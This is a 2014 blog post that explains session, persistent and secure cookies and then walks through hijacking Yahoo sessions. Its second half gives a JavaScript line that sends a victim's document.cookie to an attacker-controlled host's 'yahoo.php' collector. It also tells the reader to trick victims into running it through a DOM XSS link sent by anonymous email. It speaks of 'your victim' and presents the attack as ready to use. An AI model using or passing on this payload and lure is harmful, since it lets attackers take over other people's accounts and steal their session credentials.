Blog Details

Posted in: Blog, Posted On: Apr 09, 2014, Posted By: cyberinfoadmin

Session Hijacking of Yahoo.com

What is a Cookie?

It’s a piece of information which stays in a computer after accessing the internet. There are many types of cookies; some are given below:

Session cookie

A session cookie lasts only for the duration of which a person uses internet. A web browser normally deletes session cookies when it quits. A session cookie is created when no Expires directive is provided when the cookie is created.

Persistent cookie

A persistent cookie will outlast users’ sessions. If a persistent cookie has its Max-Age set to 1 year, then, within the year, the initial value set in that cookie would be sent back to the server every time the user visits the website. This could be used to record a vital piece of information such as how the user initially came to this website. For this reason, persistent cookies are also called tracking cookies.

Secure cookie

A secure cookie is only used when a browser is visiting a server via HTTPS, ensuring that the cookie is always encrypted when transmitting from client to server. This makes the cookie less likely to be exposed to cookie theft via eavesdropping.

Session Working Diagram given below :

The downside in Yahoo server is that the session doesn’t get expired soon enough when a user logs out. Instead, it will remain there for 24-48 hours before getting expired! This means, once an attacker gets the victim’s cookies he/she can access the Yahoo account for 24-48 hours without password!
Step 1 :
I’m doing this Yahoo session hijacking on my ID itself so I’m going to use two browsers;

Mozilla Firefox
Chrome
paid Webhosting (with Yahoo session stealer code)

Note, it won’t do webhosting for free due to security reasons.

Step 2:

Victim’s browser: Chrome

Attacker’s browser: Mozilla

Step3:

javascript:document.location=’http://Yourwebsite.com/yahoo.php?ex=’.concat(escape(document.cookie));

Ask your victim to type in the URL. After a while, you can see the cookies appear in our webhosting!

Since it is not practical to make the victim to inject our JavaScript into their browsers, we have to trick them using DOM XSS (java script) and make that java script as a URL and send an anonymous e-mail to them and make them click, and then you can see the magic of hacking!


Here is the video